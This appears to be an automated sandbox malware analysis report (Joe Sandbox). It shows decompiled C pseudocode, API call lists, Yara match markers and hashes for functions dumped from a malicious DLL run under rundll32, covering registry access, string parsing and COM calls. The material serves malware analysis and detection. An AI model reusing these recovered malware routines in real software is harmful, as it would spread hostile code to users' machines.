                            0x04a143f2
                            0x04a143f9
                            0x04a143fd
                            0x04a14402
                            0x04a1440d
                            0x04a1441d
                            0x04a1446c
                            0x04a14471
                            0x04a14471
                            0x04a14474
                            0x04a14478
                            0x04a144b2
                            0x04a144b2
                            0x04a144b8
                            0x04a144bf
                            0x04a144bf
                            0x04a1447a
                            0x04a1447d
                            0x04a1447f
                            0x04a1448c
                            0x04a1448e
                            0x04a14495
                            0x04a144cc
                            0x04a144d1
                            0x04a144d3
                            0x04a144d5
                            0x04a144d5
                            0x00000000
                            0x04a144d3
                            0x04a14497
                            0x04a1449e
                            0x04a144ac
                            0x00000000
                            0x04a144ac
                            0x04a1441f
                            0x04a1443a
                            0x04a14454
                            0x00000000
                            0x04a14454
                            0x04a1444d
                            0x00000000

                            APIs
                            • wsprintfA.USER32 ref: 04A1440D
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A14432
                              • Part of subcall function 04A1300E: GetTickCount.KERNEL32 ref: 04A13025
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13072
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A1308F
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A130B1
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A130D8
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13103
                              • Part of subcall function 04A1300E: HeapFree.KERNEL32(00000000,?), ref: 04A13116
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13135
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04A144AC
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: wsprintf$Heap$Free$AllocateCountTick
                            • String ID:
                            • API String ID: 1307794992-0
                            • Opcode ID: 69c5c8242b822697722a714d495511f88266ea6dc9b0a32c33636cfbced5b350
                            • Instruction ID: 791d8b066a209f929e73e59a4afbf19bb2b5801bd9bdd49351060498c9951a43
                            • Opcode Fuzzy Hash: 69c5c8242b822697722a714d495511f88266ea6dc9b0a32c33636cfbced5b350
                            • Instruction Fuzzy Hash: 2B313E75601208EFDB01DF98D984EDA3BBCFB58359F108022F905AB271D774E946CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F76C1E Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RegQueryValueExA.KERNEL32(00000000,746BC740,00000000,00000000,04F89068,04F6E6ED,00000001,00000000,0631C314,04F8906E,00000000,00000000,04F7CB01,0631C314,746BC740,00000000), ref: 04F76C72
                            • RegSetValueExA.KERNEL32(04F89068,00000003,00000000,00000003,04F89068,00000028), ref: 04F76CB3
                            • RegCloseKey.ADVAPI32(?), ref: 04F76CBF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$CloseCreateQuerylstrlen
                            • String ID:
                            • API String ID: 2552977122-0
                            • Opcode ID: 666065d41c388b8c255622d78aa580ef8562b30e305e39ddb982cf0ae96f4a37
                            • Instruction ID: b1f6b87ba32787864644afaae24b35f24b69cc371cf24b7b1826cb7cb579fddb
                            • Opcode Fuzzy Hash: 666065d41c388b8c255622d78aa580ef8562b30e305e39ddb982cf0ae96f4a37
                            • Instruction Fuzzy Hash: 3F312FB1D00218EFEB229FA4ED44DBEBBB8EB04724F10416FE915AA240D3796E45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F66261 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F8087A: lstrlen.KERNEL32(?,00000000,04F7BA3E,00000027,04F8A1E8,?,00000000,?,?,04F7BA3E,?,00000001,?,04F70971,00000000,?), ref: 04F808B0
                              • Part of subcall function 04F8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F808D4
                              • Part of subcall function 04F8087A: lstrcat.KERNEL32(00000000,00000000), ref: 04F808DC
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 04F662A8
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 04F662BE
                            • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04F66307
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Open$Closelstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 4131162436-0
                            • Opcode ID: 405b514bba341c6f1f41fbaf841fb67d2c71d95c158a289a86e2da5fd1008ea1
                            • Instruction ID: 3b137bc215e2afd7743bfde793faf71914e96276f2c32a61a88f05a8d744755b
                            • Opcode Fuzzy Hash: 405b514bba341c6f1f41fbaf841fb67d2c71d95c158a289a86e2da5fd1008ea1
                            • Instruction Fuzzy Hash: AE210BB1D0010DBFEB01DF95DD85CAEBBBDEB44218B10406AE601E7211D774AE56DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A13B58 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E04A13B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x4a1a2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E04A17A1E(_t57 - _a4, _a4, _t48);
							_t38 = E04A17A1E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E04A17A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                            0x04a13b60
                            0x04a13b63
                            0x04a13b65
                            0x04a13b6e
                            0x04a13b80
                            0x04a13b80
                            0x04a13b84
                            0x04a13b86
                            0x04a13b89
                            0x04a13b8c
                            0x04a13b95
                            0x04a13b9f
                            0x04a13ba3
                            0x04a13ba8
                            0x04a13bb8
                            0x04a13bbe
                            0x04a13bc2
                            0x04a13c11
                            0x04a13bc4
                            0x04a13bc4
                            0x04a13bcd
                            0x04a13bdc
                            0x04a13be1
                            0x04a13bee
                            0x04a13bf7
                            0x04a13c02
                            0x04a13c09
                            0x04a13c0d
                            0x04a13c0d
                            0x04a13bc2
                            0x04a13c18
                            0x04a13c1f

                            APIs
                            • lstrlen.KERNEL32(7620F710,?,00000000,?,7620F710), ref: 04A13B8C
                            • StrStrA.SHLWAPI(00000000,?), ref: 04A13B99
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A13BB8
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: b956889d9cad1552710c534954a6826ed9f876e50abb9204c5a46c9c0fae1b2b
                            • Instruction ID: d408881b35d18ba386eff753475faf11e5320b0a25ddb6b4f3344ee03dae1d9c
                            • Opcode Fuzzy Hash: b956889d9cad1552710c534954a6826ed9f876e50abb9204c5a46c9c0fae1b2b
                            • Instruction Fuzzy Hash: 81218E39600249AFDF118F68C884B9EBFB5EF89314F088151ED04AB315D735EE59CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16E6D Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E04A16E6D(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04A16D63(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4a19284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                            0x04a16e71
                            0x04a16e7e
                            0x04a16e80
                            0x04a16e81
                            0x04a16e89
                            0x04a16e89
                            0x04a16e8d
                            0x00000000
                            0x00000000
                            0x04a16e84
                            0x04a16e85
                            0x04a16e88
                            0x04a16e88
                            0x04a16e95
                            0x04a16e9a
                            0x04a16e9f
                            0x04a16ea7
                            0x04a16ead
                            0x04a16eaf
                            0x04a16eb2
                            0x04a16eb6
                            0x04a16eb8
                            0x04a16ebb
                            0x04a16ebb
                            0x04a16ebc
                            0x04a16ebe
                            0x04a16ebb
                            0x04a16ec8
                            0x04a16ecb
                            0x04a16ece
                            0x04a16ecf
                            0x04a16ed1
                            0x04a16ed8
                            0x04a16ed8
                            0x04a16ee4

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,055395AC,?,?,04A176A6,?,055395AC), ref: 04A16E89
                            • StrTrimA.SHLWAPI(?,04A19284,00000002,?,04A176A6,?,055395AC), ref: 04A16EA7
                            • StrChrA.SHLWAPI(?,00000020,?,04A176A6,?,055395AC), ref: 04A16EB2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: e95cba408aefa545b7fd86ac6ad6fe9035ea5f5bf95dc40d5db958feeca8c2ec
                            • Instruction ID: 0db7578b4f222a196becb12111d7170c50610412518ac5ac27857c21941f315a
                            • Opcode Fuzzy Hash: e95cba408aefa545b7fd86ac6ad6fe9035ea5f5bf95dc40d5db958feeca8c2ec
                            • Instruction Fuzzy Hash: 4001BC713003566FEB204F2ACC88F6B7B9DEBC5750F040111E941CB2E2DA70E802C6A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A17928 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E04A17928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E04A13F07(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x4a1a348; // 0xb1d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x4a1b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x4a1b8f4; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E04A123AA();
					_push( &_v64);
					if( *0x4a1a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E04A123AA();
				}
				return _t28;
			}















                            0x04a17928
                            0x04a1792f
                            0x04a17938
                            0x04a1793d
                            0x04a17941
                            0x04a1794b
                            0x04a17950
                            0x04a17955
                            0x04a1795a
                            0x04a17964
                            0x04a1796e
                            0x04a1796e
                            0x04a17966
                            0x04a17966
                            0x04a17966
                            0x04a17966
                            0x04a17974
                            0x04a1797a
                            0x04a1797b
                            0x04a1797e
                            0x04a17981
                            0x04a17984
                            0x04a1798c
                            0x04a17995
                            0x04a1799d
                            0x04a1799d
                            0x04a1799f
                            0x04a179a1
                            0x04a179a1
                            0x04a179ab

                            APIs
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(00000000), ref: 04A13F61
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(0070006F), ref: 04A13F75
                              • Part of subcall function 04A13F07: SysAllocString.OLEAUT32(00000000), ref: 04A13F87
                            • memset.NTDLL ref: 04A1794B
                            • GetLastError.KERNEL32 ref: 04A17997
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocString$ErrorLastmemset
                            • String ID: <
                            • API String ID: 3736384471-4251816714
                            • Opcode ID: a9240a0832e6fd7052791814bc5cdf47415d664cdab30d6d87cc764324a5f291
                            • Instruction ID: 03625224b162338e912c205c8ac7c3223cbc784f7c17277b92aa81f7bdbe04d2
                            • Opcode Fuzzy Hash: a9240a0832e6fd7052791814bc5cdf47415d664cdab30d6d87cc764324a5f291
                            • Instruction Fuzzy Hash: 74014076D01218ABEB10EFA8D884FDEBBB8FB08744F444125F914E7260E734A905CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7B7A4 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                            • RegOpenKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7C3
                            • lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateOpenlstrlen
                            • String ID:
                            • API String ID: 2865187142-0
                            • Opcode ID: 6492793efbcaf6cb704ebd00307f24731a72d1ad24b700facee7a1adc1a8ffcf
                            • Instruction ID: 2d4d759c5e96c8116bf8a49d1c452c3f95b99994de8dd6b760a3ef80cca23850
                            • Opcode Fuzzy Hash: 6492793efbcaf6cb704ebd00307f24731a72d1ad24b700facee7a1adc1a8ffcf
                            • Instruction Fuzzy Hash: 02F09676100208BFE7159F51DC88FBA7B7CEB46798F10800AFD0689140D674BA82C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E831 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(000005BC,04F7C3DB), ref: 04F7E83B
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F63528
                              • Part of subcall function 04F634FF: RtlDeleteCriticalSection.NTDLL(04F8A3E0), ref: 04F6355B
                              • Part of subcall function 04F634FF: RtlDeleteCriticalSection.NTDLL(04F8A400), ref: 04F63562
                              • Part of subcall function 04F634FF: ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,04F7E846), ref: 04F6358B
                              • Part of subcall function 04F634FF: CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F63597
                              • Part of subcall function 04F634FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04F7E846), ref: 04F635A3
                              • Part of subcall function 04F634FF: CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F635AF
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F635B5
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F635C9
                              • Part of subcall function 04F634FF: HeapFree.KERNEL32(00000000,00000000,?,?,04F7E846), ref: 04F635ED
                              • Part of subcall function 04F634FF: RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F63623
                              • Part of subcall function 04F634FF: SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F6363F
                            • CloseHandle.KERNEL32(000005BC), ref: 04F7E850
                            • HeapDestroy.KERNELBASE(05F20000), ref: 04F7E860
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                            • String ID:
                            • API String ID: 2773679374-0
                            • Opcode ID: 6a836c96b5cd502cbdff2ee1d071968e62e53e12484676f727f00bd4ad15b56d
                            • Instruction ID: bb738a8f81d151b08e04eea62ff4184ab302a5c033051b01c77e2713addc9ba2
                            • Opcode Fuzzy Hash: 6a836c96b5cd502cbdff2ee1d071968e62e53e12484676f727f00bd4ad15b56d
                            • Instruction Fuzzy Hash: 21E04C70E002496BDB205F75B84DA2637A9EB04741748146FA805DA140DA2CE845EA50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A12575 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A12575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04A16D63(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x4a1a378, 0x110);
					_t27 =  *0x4a1a37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04A1138A(0x110, _a4, _a4, _t27, 0);
					}
					if(E04A16BF2( &_v36) != 0) {
						_t35 = E04A15FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E04A113C7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E04A16C2C(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E04A16C2C(_a4);
				}
				return _v16;
			}
















                            0x04a1257b
                            0x04a12580
                            0x04a1258d
                            0x04a12590
                            0x04a12593
                            0x04a12598
                            0x04a1259d
                            0x04a125ab
                            0x04a125b0
                            0x04a125b5
                            0x04a125ba
                            0x04a125bc
                            0x04a125c5
                            0x04a125c5
                            0x04a125d4
                            0x04a125e9
                            0x04a125f0
                            0x04a125f7
                            0x04a125fd
                            0x04a12603
                            0x04a1260b
                            0x04a12611
                            0x04a12621
                            0x04a12626
                            0x04a1262a
                            0x04a1262a
                            0x04a125f0
                            0x04a12635
                            0x04a12640
                            0x04a12640
                            0x04a1264c

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,04A14493,?), ref: 04A125AB
                            • memset.NTDLL ref: 04A12621
                            • memset.NTDLL ref: 04A12635
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: f4ef4829dcdf11d89ff930eba6f064080ff99b806f2d5ba3622cae9a7906bebe
                            • Instruction ID: 4676ad0fe5b4c3d862c621a112f9cb35b77cc148f00ee4b4962f998b1fffc05c
                            • Opcode Fuzzy Hash: f4ef4829dcdf11d89ff930eba6f064080ff99b806f2d5ba3622cae9a7906bebe
                            • Instruction Fuzzy Hash: 8C212F76A00518BBEF11AFA5CD40FEEBFB8EF48644F044055F914E6260E734EA118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11F7A Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                            Download Yara Rule
                            C-Code - Quality: 38%
                            			E04A11F7A(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x4a1a348; // 0xb1d5a8
				_t4 = _t49 + 0x4a1b448; // 0x55389f0
				_t82 = 0;
				_t5 = _t49 + 0x4a1b438; // 0x9ba05972
				_t51 =  *0x4a1a170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x4a1a348; // 0xb1d5a8
						_t30 = _t56 + 0x4a1b428; // 0x55389d0
						_t31 = _t56 + 0x4a1b458; // 0x4c96be40
						_t58 =  *0x4a1a10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x4a1a348; // 0xb1d5a8
											_t23 = _t77 + 0x4a1b428; // 0x55389d0
											_t24 = _t77 + 0x4a1b458; // 0x4c96be40
											_t106 =  *0x4a1a10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x4a1a348; // 0xb1d5a8
													_t67 = _v28;
													_t40 = _t100 + 0x4a1b418; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                            0x04a11f85
                            0x04a11f8c
                            0x04a11f8d
                            0x04a11f8e
                            0x04a11f8f
                            0x04a11f95
                            0x04a11f9a
                            0x04a11fa3
                            0x04a11fa6
                            0x04a11fad
                            0x04a11fb3
                            0x04a11fb7
                            0x04a11fbd
                            0x04a11fc5
                            0x04a11fc6
                            0x04a11fcb
                            0x04a11fcc
                            0x04a11fce
                            0x04a11fd1
                            0x04a11fd2
                            0x04a11fd3
                            0x04a11fd9
                            0x04a1206f
                            0x04a12074
                            0x04a1207b
                            0x04a12085
                            0x04a1208b
                            0x04a1208d
                            0x04a12093
                            0x00000000
                            0x04a11fdf
                            0x04a11fdf
                            0x04a11fe6
                            0x04a11fef
                            0x04a11ff3
                            0x04a11ff9
                            0x04a11ffc
                            0x04a12064
                            0x00000000
                            0x04a11ffe
                            0x04a11ffe
                            0x04a12096
                            0x04a12098
                            0x00000000
                            0x00000000
                            0x04a12004
                            0x04a12004
                            0x04a12006
                            0x04a1200b
                            0x04a1200f
                            0x04a12012
                            0x04a12017
                            0x04a1201f
                            0x04a12020
                            0x04a12021
                            0x04a12023
                            0x04a12027
                            0x04a1202b
                            0x00000000
                            0x04a1202d
                            0x04a12031
                            0x04a12036
                            0x04a1203d
                            0x04a1204d
                            0x04a1204f
                            0x04a12055
                            0x04a1205a
